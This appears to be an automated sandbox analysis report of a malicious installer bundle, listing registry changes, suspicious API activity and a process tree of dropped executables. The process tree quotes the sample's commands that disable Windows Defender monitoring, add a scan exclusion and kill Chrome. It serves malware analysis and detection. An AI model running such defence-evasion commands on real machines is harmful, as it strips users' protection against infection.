\REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{AF60000F-661D-472A-9588-F062F6DB7A0E}\PROXYSTUBCLSID32 OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\INTERFACE\{1B7AED4F-FCAF-4DA4-8795-C03E635D8EDC}\PROXYSTUBCLSID32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{2e7c0a19-0438-41e9-81e3-3ad3d64f55ba}\LocalServer32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{ACDB5DB0-C9D5-461C-BAAA-5DCE0B980E40}\ = "ILaunchUXInterface" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{B54E7079-90C9-4C62-A6B8-B2834C33A04A}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main MicrosoftEdge.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\TypeLib\{909A6CCD-6810-46C4-89DF-05BE7EB61E6C} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\TypeLib OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{9AA2F32D-362A-42D9-9328-24A483E2CCC3}\InprocServer32\ThreadingModel = "Apartment" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\TypeLib\{082D3FEC-D0D0-4DF6-A988-053FECE7B884}\1.0\FLAGS OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{F062BA81-ADFE-4A92-886A-23FD851D6406}\ = "IGetLinkCallback" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\EdpDomStorage MicrosoftEdgeCP.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DomStorageState\EdpCleanupState = "0" MicrosoftEdgeCP.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\HistoryJournalCertificate MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\PROXYSTUBCLSID32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{AB807329-7324-431B-8B36-DBD581F56E0B} OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{917E8742-AA3B-7318-FA12-10485FB322A2}\VersionIndependentProgID OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ExtensionsStore\datastore\usage\dscc_inventory\ExtensionI = "{5908514F-FEBC-4A13-B3AA-0B27209B65FF}" MicrosoftEdge.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\TabbedBrowsing MicrosoftEdgeCP.exe Set value (data) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\ACGStatus\DynamicCodePolicy = 05000000 MicrosoftEdgeCP.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\WOW6432NODE\INTERFACE\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\PROXYSTUBCLSID32 OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A} OneDriveSetup.exe Key deleted \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_CLASSES\INTERFACE\{79A2A54C-3916-41FD-9FAB-F26ED0BBA755}\TYPELIB OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\InitPropertyBag\Attributes = "17" FileSyncConfig.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\mssharepointclient\ = "URL: mssharepointclient" OneDriveSetup.exe Set value (int) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\DOMStorage\theonlygames.com\ = "0" MicrosoftEdgeCP.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{F0AF7C30-EAE4-4644-961D-54E6E28708D6}\TypeLib\ = "{909A6CCD-6810-46C4-89DF-05BE7EB61E6C}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\ProxyStubClsid32 OneDriveSetup.exe Set value (str) \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\Interface\{390AF5A7-1390-4255-9BC9-935BFCFA5D57}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}" OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}\TypeLib OneDriveSetup.exe Key created \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000_Classes\WOW6432Node\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 OneDriveSetup.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa6530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c14000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f0b00000001000000120000004400690067006900430065007200740000001d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d43190000000100000010000000749966cecc95c1874194ca7203f9b6202000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 5c000000010000000400000000080000190000000100000010000000749966cecc95c1874194ca7203f9b6200300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa604000000010000001000000087ce0b7b2a0e4900e158719b37a893722000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 installer.exe -
Script User-Agent 6 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 547 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 665 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 672 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 62 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 111 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 522 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2104 powershell.exe 2104 powershell.exe 396 powershell.exe 396 powershell.exe 396 powershell.exe 2104 powershell.exe 3376 Mon17a0d8ec302e.exe 3376 Mon17a0d8ec302e.exe 2104 powershell.exe 396 powershell.exe 2972 zhanglijuan-game.exe 2972 zhanglijuan-game.exe 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 3680 WerFault.exe 1556 3482271.exe 1556 3482271.exe 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 1488 7933448.exe 1488 7933448.exe 2604 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
pid Process 2604 Explorer.EXE 6152 foldershare.exe -
Suspicious behavior: MapViewOfSection 28 IoCs
pid Process 3376 Mon17a0d8ec302e.exe 1372 i9iBfSFpiJLNYdkx4pTJj13W.exe 6492 MiFnSOOP3jL2bVNTqswI6fwY.exe 1372 i9iBfSFpiJLNYdkx4pTJj13W.exe 1372 i9iBfSFpiJLNYdkx4pTJj13W.exe 6492 MiFnSOOP3jL2bVNTqswI6fwY.exe 6492 MiFnSOOP3jL2bVNTqswI6fwY.exe 6852 mbqtmEoq2yLOhYkBnJknXxjC.exe 5528 control.exe 5528 control.exe 6436 pPg9gR09BXK6mbu2BNNejH5P.exe 4496 Uu8ktdPLBFcY1iPXMPwESBiH.exe 7324 MicrosoftEdgeCP.exe 7324 MicrosoftEdgeCP.exe 7324 MicrosoftEdgeCP.exe 7324 MicrosoftEdgeCP.exe 5208 tvssfjc 5528 control.exe 5528 control.exe 7324 MicrosoftEdgeCP.exe 7324 MicrosoftEdgeCP.exe 5528 control.exe 5528 control.exe 7324 MicrosoftEdgeCP.exe 7324 MicrosoftEdgeCP.exe 8372 tvssfjc 6600 MicrosoftEdgeCP.exe 6600 MicrosoftEdgeCP.exe -
Suspicious behavior: SetClipboardViewer 1 IoCs
pid Process 2196 2367830.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeCreateTokenPrivilege 3884 Mon17870faab0.exe Token: SeAssignPrimaryTokenPrivilege 3884 Mon17870faab0.exe Token: SeLockMemoryPrivilege 3884 Mon17870faab0.exe Token: SeIncreaseQuotaPrivilege 3884 Mon17870faab0.exe Token: SeMachineAccountPrivilege 3884 Mon17870faab0.exe Token: SeTcbPrivilege 3884 Mon17870faab0.exe Token: SeSecurityPrivilege 3884 Mon17870faab0.exe Token: SeTakeOwnershipPrivilege 3884 Mon17870faab0.exe Token: SeLoadDriverPrivilege 3884 Mon17870faab0.exe Token: SeSystemProfilePrivilege 3884 Mon17870faab0.exe Token: SeSystemtimePrivilege 3884 Mon17870faab0.exe Token: SeProfSingleProcessPrivilege 3884 Mon17870faab0.exe Token: SeIncBasePriorityPrivilege 3884 Mon17870faab0.exe Token: SeCreatePagefilePrivilege 3884 Mon17870faab0.exe Token: SeCreatePermanentPrivilege 3884 Mon17870faab0.exe Token: SeBackupPrivilege 3884 Mon17870faab0.exe Token: SeRestorePrivilege 3884 Mon17870faab0.exe Token: SeShutdownPrivilege 3884 Mon17870faab0.exe Token: SeDebugPrivilege 3884 Mon17870faab0.exe Token: SeAuditPrivilege 3884 Mon17870faab0.exe Token: SeSystemEnvironmentPrivilege 3884 Mon17870faab0.exe Token: SeChangeNotifyPrivilege 3884 Mon17870faab0.exe Token: SeRemoteShutdownPrivilege 3884 Mon17870faab0.exe Token: SeUndockPrivilege 3884 Mon17870faab0.exe Token: SeSyncAgentPrivilege 3884 Mon17870faab0.exe Token: SeEnableDelegationPrivilege 3884 Mon17870faab0.exe Token: SeManageVolumePrivilege 3884 Mon17870faab0.exe Token: SeImpersonatePrivilege 3884 Mon17870faab0.exe Token: SeCreateGlobalPrivilege 3884 Mon17870faab0.exe Token: 31 3884 Mon17870faab0.exe Token: 32 3884 Mon17870faab0.exe Token: 33 3884 Mon17870faab0.exe Token: 34 3884 Mon17870faab0.exe Token: 35 3884 Mon17870faab0.exe Token: SeDebugPrivilege 2160 Mon178d8e5d06822.exe Token: SeDebugPrivilege 1484 WinHoster.exe Token: SeDebugPrivilege 396 powershell.exe Token: SeDebugPrivilege 2104 powershell.exe Token: SeRestorePrivilege 3680 WerFault.exe Token: SeBackupPrivilege 3680 WerFault.exe Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeDebugPrivilege 3680 WerFault.exe Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE Token: SeDebugPrivilege 3500 chrome.exe Token: SeDebugPrivilege 2152 DownFlSetup110.exe Token: SeDebugPrivilege 1152 chrome2.exe Token: SeShutdownPrivilege 2604 Explorer.EXE Token: SeCreatePagefilePrivilege 2604 Explorer.EXE -
Suspicious use of FindShellTrayWindow 15 IoCs
pid Process 2972 zhanglijuan-game.exe 2604 Explorer.EXE 2604 Explorer.EXE 7452 installer.exe 2604 Explorer.EXE 2604 Explorer.EXE 7424 Calculator.exe 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE -
Suspicious use of SendNotifyMessage 7 IoCs
pid Process 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE 2604 Explorer.EXE -
Suspicious use of SetWindowsHookEx 8 IoCs
pid Process 2604 Explorer.EXE 6312 MicrosoftEdge.exe 6756 MicrosoftEdge.exe 7324 MicrosoftEdgeCP.exe 7324 MicrosoftEdgeCP.exe 8996 MicrosoftEdge.exe 6600 MicrosoftEdgeCP.exe 6600 MicrosoftEdgeCP.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3324 wrote to memory of 4860 3324 setup_x86_x64_install.exe 78 PID 3324 wrote to memory of 4860 3324 setup_x86_x64_install.exe 78 PID 3324 wrote to memory of 4860 3324 setup_x86_x64_install.exe 78 PID 4860 wrote to memory of 520 4860 setup_installer.exe 79 PID 4860 wrote to memory of 520 4860 setup_installer.exe 79 PID 4860 wrote to memory of 520 4860 setup_installer.exe 79 PID 520 wrote to memory of 1724 520 setup_install.exe 82 PID 520 wrote to memory of 1724 520 setup_install.exe 82 PID 520 wrote to memory of 1724 520 setup_install.exe 82 PID 520 wrote to memory of 1796 520 setup_install.exe 83 PID 520 wrote to memory of 1796 520 setup_install.exe 83 PID 520 wrote to memory of 1796 520 setup_install.exe 83 PID 520 wrote to memory of 1896 520 setup_install.exe 84 PID 520 wrote to memory of 1896 520 setup_install.exe 84 PID 520 wrote to memory of 1896 520 setup_install.exe 84 PID 1796 wrote to memory of 396 1796 cmd.exe 113 PID 1796 wrote to memory of 396 1796 cmd.exe 113 PID 1796 wrote to memory of 396 1796 cmd.exe 113 PID 1724 wrote to memory of 2104 1724 cmd.exe 85 PID 1724 wrote to memory of 2104 1724 cmd.exe 85 PID 1724 wrote to memory of 2104 1724 cmd.exe 85 PID 520 wrote to memory of 2228 520 setup_install.exe 86 PID 520 wrote to memory of 2228 520 setup_install.exe 86 PID 520 wrote to memory of 2228 520 setup_install.exe 86 PID 520 wrote to memory of 2412 520 setup_install.exe 112 PID 520 wrote to memory of 2412 520 setup_install.exe 112 PID 520 wrote to memory of 2412 520 setup_install.exe 112 PID 520 wrote to memory of 2644 520 setup_install.exe 111 PID 520 wrote to memory of 2644 520 setup_install.exe 111 PID 520 wrote to memory of 2644 520 setup_install.exe 111 PID 520 wrote to memory of 1960 520 setup_install.exe 87 PID 520 wrote to memory of 1960 520 setup_install.exe 87 PID 520 wrote to memory of 1960 520 setup_install.exe 87 PID 520 wrote to memory of 2800 520 setup_install.exe 99 PID 520 wrote to memory of 2800 520 setup_install.exe 99 PID 520 wrote to memory of 2800 520 setup_install.exe 99 PID 520 wrote to memory of 2900 520 setup_install.exe 88 PID 520 wrote to memory of 2900 520 setup_install.exe 88 PID 520 wrote to memory of 2900 520 setup_install.exe 88 PID 2228 wrote to memory of 2888 2228 cmd.exe 98 PID 2228 wrote to memory of 2888 2228 cmd.exe 98 PID 2228 wrote to memory of 2888 2228 cmd.exe 98 PID 520 wrote to memory of 4920 520 setup_install.exe 97 PID 520 wrote to memory of 4920 520 setup_install.exe 97 PID 520 wrote to memory of 4920 520 setup_install.exe 97 PID 1896 wrote to memory of 3884 1896 cmd.exe 89 PID 1896 wrote to memory of 3884 1896 cmd.exe 89 PID 1896 wrote to memory of 3884 1896 cmd.exe 89 PID 520 wrote to memory of 4200 520 setup_install.exe 96 PID 520 wrote to memory of 4200 520 setup_install.exe 96 PID 520 wrote to memory of 4200 520 setup_install.exe 96 PID 520 wrote to memory of 4736 520 setup_install.exe 95 PID 520 wrote to memory of 4736 520 setup_install.exe 95 PID 520 wrote to memory of 4736 520 setup_install.exe 95 PID 520 wrote to memory of 2660 520 setup_install.exe 94 PID 520 wrote to memory of 2660 520 setup_install.exe 94 PID 520 wrote to memory of 2660 520 setup_install.exe 94 PID 2412 wrote to memory of 4628 2412 cmd.exe 90 PID 2412 wrote to memory of 4628 2412 cmd.exe 90 PID 2412 wrote to memory of 4628 2412 cmd.exe 90 PID 520 wrote to memory of 68 520 setup_install.exe 93 PID 520 wrote to memory of 68 520 setup_install.exe 93 PID 520 wrote to memory of 68 520 setup_install.exe 93 PID 1960 wrote to memory of 5008 1960 cmd.exe 91
Processes
-
c:\windows\system32\svchost.exec:\windows\system32\svchost.exe -k netsvcs -s BITS1⤵
- Suspicious use of SetThreadContext
PID:5060 -
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k SystemNetworkService2⤵
- Drops file in System32 directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
PID:6952
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
PID:2604 -
C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"2⤵
- Suspicious use of WriteProcessMemory
PID:3324 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2104
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious use of WriteProcessMemory
PID:1796 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:396
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon17870faab0.exe5⤵
- Suspicious use of WriteProcessMemory
PID:1896 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon17870faab0.exeMon17870faab0.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3884 -
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe7⤵PID:7904
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe8⤵
- Kills process with taskkill
PID:4040
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Mon178e7a516181.exe5⤵
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Users\Admin\AppData\Local\Temp\7zSCF2FBC46\Mon178e7a516181.exeMon178e7a516181.exe6⤵
- Executes dropped EXE
- Checks computer location settings
PID:2888 -
C:\Users\Admin\Pictures\Adobe Films\qxC1nsEi42vuuuXTOfADEOqE.exe"C:\Users\Admin\Pictures\Adobe Films\qxC1nsEi42vuuuXTOfADEOqE.exe"7⤵
- Executes dropped EXE
